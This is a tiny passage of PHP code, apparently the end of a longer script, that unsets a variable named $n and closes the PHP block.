unset($n); ?>